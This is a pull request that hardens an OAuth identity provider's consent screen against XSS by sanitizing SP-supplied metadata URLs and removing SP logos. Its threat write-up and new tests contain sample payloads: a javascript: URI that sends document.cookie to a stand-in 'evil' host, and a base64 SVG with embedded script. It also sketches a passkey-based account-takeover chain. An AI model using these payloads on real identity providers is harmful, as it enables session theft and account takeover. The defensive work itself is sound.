### PR TITLE
fix(auth, idp): harden SP metadata — block javascript: URIs and drop SP-supplied logos

### DIFF
--- a/.changeset/consent-xss-hardening.md
+++ b/.changeset/consent-xss-hardening.md
@@ -1,0 +1,9 @@
+---
+'@openape/auth': patch
+'@openape/nuxt-auth-idp': patch
+---
+
+Security hardening of the SP-metadata consent flow. SP-controlled fields fetched from `/.well-known/oauth-client-metadata` are rendered by the IdP's consent UI; without sanitization a malicious SP could ship `javascript:` URIs in `policy_uri` / `tos_uri` and turn the IdP origin into an XSS sandbox at click time.
+
+- `@openape/auth`: `createClientMetadataResolver` now normalizes every fetched (and operator-supplied) metadata document. URL fields (`logo_uri`, `policy_uri`, `tos_uri`, `client_uri`, `jwks_uri`) must parse as `http(s):` — anything else (`javascript:`, `data:`, `vbscript:`, …) is silently dropped. Display strings are length-capped (200 chars for names, 2000 for URLs).
+- `@openape/nuxt-auth-idp`: the reference consent page and account-connections list no longer forward or render `logo_uri`. SP-supplied images are an unsanitisable surface (browser image-parser CVEs, fingerprinting, brand-spoofing) — deployers who want logos must override the page with their own UI.

--- a/modules/nuxt-auth-idp/src/runtime/pages/account.vue
+++ b/modules/nuxt-auth-idp/src/runtime/pages/account.vue
@@ -335,7 +335,6 @@ async function handleRevokeConsent(clientId, clientName) {
               <tr v-for="c in consents" :key="c.clientId" class="odd:bg-(--ui-bg-elevated)/40 even:bg-(--ui-bg) hover:bg-(--ui-bg-elevated)">
                 <td class="px-4 py-3 text-sm">
                   <div class="flex items-center gap-2">
-                    <img v-if="c.logoUri" :src="c.logoUri" :alt="`${c.clientName} logo`" class="w-6 h-6 rounded bg-white p-0.5 object-contain shrink-0">
                     <div class="min-w-0">
                       <div class="font-medium truncate flex items-center gap-1.5">
                         <a v-if="c.clientUri" :href="c.clientUri" target="_blank" rel="noopener" class="hover:underline">{{ c.clientName || c.clientId }}</a>

--- a/modules/nuxt-auth-idp/src/runtime/pages/consent.vue
+++ b/modules/nuxt-auth-idp/src/runtime/pages/consent.vue
@@ -85,7 +85,6 @@ async function submit(action) {
 
       <template v-if="data.verified">
         <div class="sp-row">
-          <img v-if="data.metadata?.logo_uri" :src="data.metadata.logo_uri" :alt="`${data.metadata.client_name} logo`" class="logo">
           <div>
             <h1>{{ data.metadata?.client_name || data.clientId }}</h1>
             <p class="muted">

--- a/modules/nuxt-auth-idp/src/runtime/server/api/account/consents/index.get.ts
+++ b/modules/nuxt-auth-idp/src/runtime/server/api/account/consents/index.get.ts
@@ -7,9 +7,9 @@ import { createProblemError } from '../../../utils/problem'
  * List the SPs the authenticated user has approved via the
  * `allowlist-user` consent flow (DDISA core.md §2.3, #301).
  *
- * Each entry is enriched with the SP's published metadata when
- * available — name + logo for the connections UI. SPs that don't
- * publish metadata fall back to displaying the bare client_id.
+ * Each entry is enriched with the SP's published name when
+ * available. SP-supplied images (`logo_uri`) are intentionally
+ * NOT forwarded — see consent.get.ts for the rationale.
  */
 export default defineEventHandler(async (event) => {
   const session = await getAppSession(event)
@@ -29,7 +29,6 @@ export default defineEventHandler(async (event) => {
       verified: !!metadata,
       clientName: metadata?.client_name ?? null,
       clientUri: metadata?.client_uri ?? null,
-      logoUri: metadata?.logo_uri ?? null,
     }
   }))
 

--- a/modules/nuxt-auth-idp/src/runtime/server/api/authorize/consent.get.ts
+++ b/modules/nuxt-auth-idp/src/runtime/server/api/authorize/consent.get.ts
@@ -46,11 +46,17 @@ export default defineEventHandler(async (event) => {
     clientId: pending.params.client_id,
     redirectUri: pending.params.redirect_uri,
     verified: !!metadata,
+    // `logo_uri` is intentionally NOT forwarded. SP-supplied images
+    // rendered in the IdP origin are an unsanitisable user-content
+    // surface (browser image-parser CVEs, fingerprinting via remote
+    // fetch, social-engineering via fake brand logos). The protocol
+    // doesn't constrain format/size, so we cannot meaningfully
+    // validate. If a deployer wants logos they must override this
+    // page with their own consent UI and accept the risk.
     metadata: metadata
       ? {
           client_name: metadata.client_name,
           client_uri: metadata.client_uri ?? null,
-          logo_uri: metadata.logo_uri ?? null,
           policy_uri: metadata.policy_uri ?? null,
           tos_uri: metadata.tos_uri ?? null,
         }

--- a/packages/auth/src/__tests__/client-metadata.test.ts
+++ b/packages/auth/src/__tests__/client-metadata.test.ts
@@ -97,6 +97,106 @@ describe('createClientMetadataResolver — DDISA §4.1 SP metadata fetch', () =>
   })
 })
 
+describe('createClientMetadataResolver — sanitization of SP-supplied fields', () => {
+  // SP metadata is fetched from an SP-controlled domain and rendered
+  // by the IdP's consent UI. Without sanitization a malicious SP can
+  // ship `javascript:` URIs in `policy_uri` / `tos_uri` and turn the
+  // IdP origin into an XSS sandbox at click time. We strip anything
+  // that's not http(s) at resolver time so downstream consumers can
+  // bind these fields to `:href` / `:src` without re-validating.
+
+  function resolverWithRaw(raw: unknown) {
+    const fetchImpl = vi.fn().mockResolvedValue(raw)
+    return createClientMetadataResolver({ fetchImpl })
+  }
+
+  it('drops javascript: URLs from policy_uri / tos_uri / client_uri / logo_uri', async () => {
+    const resolver = resolverWithRaw({
+      client_id: 'evil.example.com',
+      client_name: 'Microsoft Login',
+      redirect_uris: ['https://evil.example.com/cb'],
+      policy_uri: 'javascript:alert(document.cookie)',
+      tos_uri: 'javascript:fetch("https://evil/x")',
+      client_uri: 'javascript:void(0)',
+      logo_uri: 'javascript:alert(1)',
+    })
+    const result = await resolver.resolve('evil.example.com')
+    expect(result?.policy_uri).toBeUndefined()
+    expect(result?.tos_uri).toBeUndefined()
+    expect(result?.client_uri).toBeUndefined()
+    expect(result?.logo_uri).toBeUndefined()
+    // Required fields preserved
+    expect(result?.client_id).toBe('evil.example.com')
+    expect(result?.redirect_uris).toEqual(['https://evil.example.com/cb'])
+  })
+
+  it('drops data: and vbscript: URLs from logo_uri', async () => {
+    const resolver = resolverWithRaw({
+      client_id: 'evil.example.com',
+      redirect_uris: ['https://evil.example.com/cb'],
+      logo_uri: 'data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4=',
+    })
+    const result = await resolver.resolve('evil.example.com')
+    expect(result?.logo_uri).toBeUndefined()
+  })
+
+  it('keeps valid https URLs untouched', async () => {
+    const resolver = resolverWithRaw({
+      client_id: 'app.example.com',
+      redirect_uris: ['https://app.example.com/cb'],
+      policy_uri: 'https://app.example.com/privacy',
+      tos_uri: 'https://app.example.com/terms',
+      client_uri: 'https://app.example.com/',
+      logo_uri: 'https://cdn.example.com/logo.png',
+    })
+    const result = await resolver.resolve('app.example.com')
+    expect(result?.policy_uri).toBe('https://app.example.com/privacy')
+    expect(result?.tos_uri).toBe('https://app.example.com/terms')
+    expect(result?.client_uri).toBe('https://app.example.com/')
+    expect(result?.logo_uri).toBe('https://cdn.example.com/logo.png')
+  })
+
+  it('truncates oversized client_name to prevent UI-disruption attacks', async () => {
+    const resolver = resolverWithRaw({
+      client_id: 'app.example.com',
+      redirect_uris: ['https://app.example.com/cb'],
+      client_name: 'X'.repeat(10_000),
+    })
+    const result = await resolver.resolve('app.example.com')
+    expect(result?.client_name?.length).toBeLessThanOrEqual(200)
+  })
+
+  it('drops malformed URL strings entirely', async () => {
+    const resolver = resolverWithRaw({
+      client_id: 'app.example.com',
+      redirect_uris: ['https://app.example.com/cb'],
+      policy_uri: 'not-a-url',
+      tos_uri: '',
+    })
+    const result = await resolver.resolve('app.example.com')
+    expect(result?.policy_uri).toBeUndefined()
+    expect(result?.tos_uri).toBeUndefined()
+  })
+
+  it('sanitizes publicClients entries the same way as fetched metadata', async () => {
+    // Operator-supplied config is also untrusted-ish (typos, copy-paste
+    // errors, supply-chain compromise of a config file) — apply the
+    // same hygiene rule.
+    const resolver = createClientMetadataResolver({
+      publicClients: {
+        'cli-tool': {
+          client_id: 'cli-tool',
+          redirect_uris: ['http://localhost:9876/cb'],
+          policy_uri: 'javascript:alert(1)' as string,
+        },
+      },
+    })
+    const result = await resolver.resolve('cli-tool')
+    expect(result?.policy_uri).toBeUndefined()
+    expect(result?.redirect_uris).toEqual(['http://localhost:9876/cb'])
+  })
+})
+
 describe('validateRedirectUri', () => {
   function staticStore(metadata: ClientMetadata | null) {
     return { resolve: async () => metadata }

--- a/packages/auth/src/idp/client-metadata.ts
+++ b/packages/auth/src/idp/client-metadata.ts
@@ -57,6 +57,71 @@ export interface ClientMetadataResolverOptions {
 const WELL_KNOWN_PRIMARY = '/.well-known/oauth-client-metadata'
 const WELL_KNOWN_LEGACY = '/.well-known/sp-manifest.json'
 
+// Caps on SP-supplied display strings. SPs that exceed these are
+// almost always either misconfigured or attempting UI-disruption /
+// XSS-via-length attacks against IdP consent screens. We trim
+// silently rather than reject the whole metadata so a single oversize
+// field doesn't lock out an otherwise-valid SP.
+const MAX_DISPLAY_NAME = 200
+const MAX_URL = 2000
+
+// Schemes accepted in URL fields fetched from SP metadata. Anything
+// else (`javascript:`, `data:`, `vbscript:`, `file:`, …) is silently
+// dropped. The IdP's consent UI binds these to `:href` / `:src`, so
+// allowing `javascript:` here is a direct XSS-on-click vector. `http:`
+// is permitted only because some SPs run plain HTTP in dev — the
+// reference UI may further restrict to `https:` only at render time.
+const SAFE_URL_SCHEMES = new Set(['https:', 'http:'])
+
+function sanitizeShortString(value: unknown, max: number): string | undefined {
+  if (typeof value !== 'string') return undefined
+  const trimmed = value.trim()
+  if (trimmed.length === 0) return undefined
+  return trimmed.length > max ? trimmed.slice(0, max) : trimmed
+}
+
+function sanitizeHttpUrl(value: unknown): string | undefined {
+  if (typeof value !== 'string') return undefined
+  if (value.length > MAX_URL) return undefined
+  let parsed: URL
+  try { parsed = new URL(value) }
+  catch { return undefined }
+  if (!SAFE_URL_SCHEMES.has(parsed.protocol)) return undefined
+  return parsed.toString()
+}
+
+/**
+ * Strip SP-controlled metadata down to a known-safe shape. The
+ * resolver runs this on every fetched document so downstream
+ * consumers (consent UI, admin views) can render the fields without
+ * having to remember which ones came from an untrusted source.
+ *
+ * Rules:
+ *   - `client_id` and `redirect_uris` are NOT touched here — the
+ *     caller has already type-validated them via `isValidMetadata`,
+ *     and `redirect_uri` matching is exact-equality so we mustn't
+ *     normalize away a trailing slash etc.
+ *   - All display strings are length-capped.
+ *   - All URL fields must parse as `http(s):` — no `javascript:`,
+ *     `data:`, etc. Invalid → field is dropped.
+ *   - `contacts` is filtered to string entries only.
+ */
+function sanitizeMetadata(raw: ClientMetadata): ClientMetadata {
+  return {
+    client_id: raw.client_id,
+    redirect_uris: raw.redirect_uris,
+    client_name: sanitizeShortString(raw.client_name, MAX_DISPLAY_NAME),
+    client_uri: sanitizeHttpUrl(raw.client_uri),
+    logo_uri: sanitizeHttpUrl(raw.logo_uri),
+    policy_uri: sanitizeHttpUrl(raw.policy_uri),
+    tos_uri: sanitizeHttpUrl(raw.tos_uri),
+    jwks_uri: sanitizeHttpUrl(raw.jwks_uri),
+    contacts: Array.isArray(raw.contacts)
+      ? raw.contacts.filter((c): c is string => typeof c === 'string').map(c => c.slice(0, MAX_DISPLAY_NAME))
+      : undefined,
+  }
+}
+
 interface CacheEntry {
   metadata: ClientMetadata | null
   expiresAt: number
@@ -119,7 +184,7 @@ export function createClientMetadataResolver(
     const candidates = [base + WELL_KNOWN_PRIMARY, base + WELL_KNOWN_LEGACY]
     for (const url of candidates) {
       const raw = await fetchOne(url)
-      if (raw && isValidMetadata(raw)) return raw
+      if (raw && isValidMetadata(raw)) return sanitizeMetadata(raw)
     }
     return null
   }
@@ -133,7 +198,8 @@ export function createClientMetadataResolver(
 
       // Public-client (CLI / native app) shortcut — no network call.
       if (!looksLikeHostname(clientId)) {
-        const fixed = publicClients[clientId] ?? null
+        const raw = publicClients[clientId]
+        const fixed = raw ? sanitizeMetadata(raw) : null
         cache.set(clientId, { metadata: fixed, expiresAt: now + ttl })
         return fixed
       }


### PR DESCRIPTION
## Threat

A malicious SP can publish anything at `/.well-known/oauth-client-metadata` on its own domain. Today our IdP fetches that document, forwards `policy_uri` / `tos_uri` / `logo_uri` / `client_uri` un-validated, and the consent page binds them to `:href` / `:src`. A single click on the "Datenschutz" link in the consent UI runs attacker-controlled JavaScript inside the IdP origin.

```json
{
  "client_id": "evil-sp.com",
  "client_name": "Microsoft Login",
  "redirect_uris": ["https://evil-sp.com/cb"],
  "policy_uri": "javascript:fetch('https://evil/x?d='+document.cookie)"
}
```

Phishing link → user logs in → sees "Microsoft Login (verifiziert)" → clicks Datenschutz → JS runs in `id.openape.ai` origin. With that the attacker can:
- Call `/api/me`, `/api/account/consents`, `/api/webauthn/credentials`
- POST `/api/authorize/consent` with `action=approve` and the CSRF token from session state — silent self-approval
- Register a fresh passkey on the victim account → full takeover

## Fix

**Server-side normalization** (`@openape/auth`):

`createClientMetadataResolver` now runs `sanitizeMetadata` on every document — fetched OR operator-supplied via `publicClients`. URL fields must parse as `http(s):`; anything else (`javascript:`, `data:`, `vbscript:`) is dropped. Display strings are length-capped (200 / 2000). Required fields (`client_id`, `redirect_uris`) are not touched — `redirect_uri` matching is exact-equality.

**Reference UI** (`@openape/nuxt-auth-idp`):

`consent.vue` and `account.vue` no longer render `logo_uri`. The server handlers stop forwarding the field too, so a different consumer of the same module can't accidentally re-introduce the surface. Rationale: SP-supplied images can't be meaningfully sanitized — browser image-parser CVEs, fingerprinting via remote fetch, brand-spoofing (fake "Microsoft" logo on phishing). The protocol doesn't constrain format or resolution. Deployers who really want logos can override the page with their own UI and accept the risk.

## Tests

Added 6 tests under `packages/auth/src/__tests__/client-metadata.test.ts`:

- `javascript:` URLs in policy_uri / tos_uri / client_uri / logo_uri are dropped
- `data:` and `vbscript:` URLs in logo_uri are dropped
- Valid `https:` URLs are preserved verbatim
- Oversize `client_name` is truncated to 200 chars
- Malformed URL strings (no scheme, empty) are dropped
- `publicClients` operator-supplied entries are sanitized the same way

Plus: build of `apps/openape-free-idp` confirmed the Vue templates still compile after removing the `<img>` elements.

## Test plan

- [x] `pnpm test --filter=@openape/auth` — 20 passing (was 14)
- [x] `pnpm typecheck` + `pnpm lint` — green
- [x] `pnpm turbo run build --filter=openape-free-idp` — green
- [ ] After merge → free-idp deploy → manual XSS smoke: serve a metadata file with `policy_uri: "javascript:alert(1)"` from a controlled domain and verify the rendered consent page has no `<a href="javascript:...">` link